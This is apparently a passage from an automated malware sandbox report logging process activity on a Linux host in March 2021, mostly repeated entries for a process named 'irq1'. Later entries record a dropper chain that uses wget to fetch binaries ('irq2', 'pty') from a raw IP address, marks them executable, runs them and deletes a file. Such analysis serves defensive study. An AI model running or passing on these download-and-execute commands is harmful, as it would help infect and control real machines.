    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9286 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9302 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9304 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9305 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9306 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9307 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9308 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9309 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9310 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9311 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9312 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9313 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9314 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9315 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9316 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9317 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9318 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9319 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9320 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9321 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9340 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9341 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9342 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9343 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9344 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9345 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9352 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9353 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9354 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9355 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9356 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9357 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9358 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9359 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9360 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9361 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9362 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9363 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9364 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9379 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9380 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9383 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9384 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9385 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9386 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9387 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9388 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9389 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9390 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9391 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9392 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9404 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9406 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9407 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9408 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9409 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9410 Parent PID: 9006

    General

    Start time:05:30:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9411 Parent PID: 9006

    General

    Start time:05:30:22
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9412 Parent PID: 9006

    General

    Start time:05:30:22
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9413 Parent PID: 9006

    General

    Start time:05:30:22
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9414 Parent PID: 9006

    General

    Start time:05:30:22
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9415 Parent PID: 9006

    General

    Start time:05:30:22
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9416 Parent PID: 9006

    General

    Start time:05:30:22
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9417 Parent PID: 9006

    General

    Start time:05:30:22
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9418 Parent PID: 9006

    General

    Start time:05:30:22
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9436 Parent PID: 9006

    General

    Start time:05:30:22
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9437 Parent PID: 9006

    General

    Start time:05:30:22
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9440 Parent PID: 9006

    General

    Start time:05:30:22
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9442 Parent PID: 9006

    General

    Start time:05:30:22
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 9698 Parent PID: 9006

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5979 Parent PID: 4580

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: wget PID: 5979 Parent PID: 4580

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/usr/bin/wget
    Arguments:wget http://71.127.148.69/.x/irq2 -O irq2
    File size:474656 bytes
    MD5 hash:458ce58ac4b1aac3eafc287fa46bf92d

    Analysis Process: sh PID: 6382 Parent PID: 4580

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 6382 Parent PID: 4580

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod +x irq2
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 6385 Parent PID: 4580

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 6385 Parent PID: 4580

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 irq2
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 6392 Parent PID: 4580

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: irq2 PID: 6392 Parent PID: 4580

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:./irq2
    Arguments:/usr/bin/qemu-mipsel ./irq2
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 6393 Parent PID: 4580

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: wget PID: 6393 Parent PID: 4580

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/bin/wget
    Arguments:wget http://71.127.148.69/.x/pty -O /var/tmp/pty
    File size:474656 bytes
    MD5 hash:458ce58ac4b1aac3eafc287fa46bf92d

    Analysis Process: sh PID: 6699 Parent PID: 4580

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 6699 Parent PID: 4580

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod +x /var/tmp/pty
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 6705 Parent PID: 4580

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 6705 Parent PID: 4580

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 /var/tmp/pty
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 6712 Parent PID: 4580

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: pty PID: 6712 Parent PID: 4580

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/var/tmp/pty
    Arguments:/var/tmp/pty
    File size:44700 bytes
    MD5 hash:05e1c4a7333bfbd41d109ffc2f70a52a

    Analysis Process: pty PID: 6729 Parent PID: 6712

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/var/tmp/pty
    Arguments:n/a
    File size:44700 bytes
    MD5 hash:05e1c4a7333bfbd41d109ffc2f70a52a

    Analysis Process: sh PID: 6713 Parent PID: 4580

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: wget PID: 6713 Parent PID: 4580

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/bin/wget
    Arguments:wget http://71.127.148.69/.x/pty -O /var/run/pty
    File size:474656 bytes
    MD5 hash:458ce58ac4b1aac3eafc287fa46bf92d

    Analysis Process: sh PID: 7019 Parent PID: 4580

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 7019 Parent PID: 4580

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod +x /var/run/pty
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 7024 Parent PID: 4580

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 7024 Parent PID: 4580

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 /var/run/pty
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 7031 Parent PID: 4580

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7032 Parent PID: 4580

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: rm PID: 7032 Parent PID: 4580

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/rm
    Arguments:rm -rf /var/run/1sh
    File size:60272 bytes
    MD5 hash:b79876063d894c449856cca508ecca7f

    Analysis Process: systemd PID: 6376 Parent PID: 1

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/lib/systemd/systemd
    Arguments:n/a
    File size:0 bytes
    MD5 hash:00000000000000000000000000000000

    Analysis Process: sshd PID: 6376 Parent PID: 1

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/sshd
    Arguments:/usr/sbin/sshd -D
    File size:791024 bytes
    MD5 hash:661b2a2da3b6c7d7ef41d0b9da1caa3b

    Analysis Process: upstart PID: 8683 Parent PID: 3310

    General

    Start time:05:30:14
    Start date:25/03/2021
    Path:/sbin/upstart
    Arguments:n/a
    File size:0 bytes
    MD5 hash:00000000000000000000000000000000

    Analysis Process: sh PID: 8683 Parent PID: 3310

    General

    Start time:05:30:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:/bin/sh -e /proc/self/fd/9
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 8686 Parent PID: 8683

    General

    Start time:05:30:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: date PID: 8686 Parent PID: 8683

    General

    Start time:05:30:14
    Start date:25/03/2021
    Path:/bin/date
    Arguments:date
    File size:68464 bytes
    MD5 hash:54903b613f9019bfca9f5d28a4fff34e

    Analysis Process: sh PID: 8705 Parent PID: 8683

    General

    Start time:05:30:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: apport-checkreports PID: 8705 Parent PID: 8683

    General

    Start time:05:30:14
    Start date:25/03/2021
    Path:/usr/share/apport/apport-checkreports
    Arguments:/usr/bin/python3 /usr/share/apport/apport-checkreports --system
    File size:1269 bytes
    MD5 hash:1a7d84ebc34df04e55ca3723541f48c9

    Analysis Process: upstart PID: 8937 Parent PID: 3310

    General

    Start time:05:30:16
    Start date:25/03/2021
    Path:/sbin/upstart
    Arguments:n/a
    File size:0 bytes
    MD5 hash:00000000000000000000000000000000

    Analysis Process: sh PID: 8937 Parent PID: 3310

    General

    Start time:05:30:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:/bin/sh -e /proc/self/fd/9
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 8938 Parent PID: 8937

    General

    Start time:05:30:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: date PID: 8938 Parent PID: 8937

    General

    Start time:05:30:16
    Start date:25/03/2021
    Path:/bin/date
    Arguments:date
    File size:68464 bytes
    MD5 hash:54903b613f9019bfca9f5d28a4fff34e

    Analysis Process: sh PID: 8942 Parent PID: 8937

    General

    Start time:05:30:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: apport-gtk PID: 8942 Parent PID: 8937

    General

    Start time:05:30:16
    Start date:25/03/2021
    Path:/usr/share/apport/apport-gtk
    Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
    File size:23806 bytes
    MD5 hash:ec58a49a30ef6a29406a204f28cc7d87

    Analysis Process: upstart PID: 8964 Parent PID: 3310

    General

    Start time:05:30:16
    Start date:25/03/2021
    Path:/sbin/upstart
    Arguments:n/a
    File size:0 bytes
    MD5 hash:00000000000000000000000000000000

    Analysis Process: sh PID: 8964 Parent PID: 3310

    General

    Start time:05:30:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:/bin/sh -e /proc/self/fd/9
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 8965 Parent PID: 8964

    General

    Start time:05:30:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: date PID: 8965 Parent PID: 8964

    General

    Start time:05:30:16
    Start date:25/03/2021
    Path:/bin/date
    Arguments:date
    File size:68464 bytes
    MD5 hash:54903b613f9019bfca9f5d28a4fff34e

    Analysis Process: sh PID: 8966 Parent PID: 8964

    General

    Start time:05:30:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: apport-gtk PID: 8966 Parent PID: 8964

    General

    Start time:05:30:16
    Start date:25/03/2021
    Path:/usr/share/apport/apport-gtk
    Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
    File size:23806 bytes
    MD5 hash:ec58a49a30ef6a29406a204f28cc7d87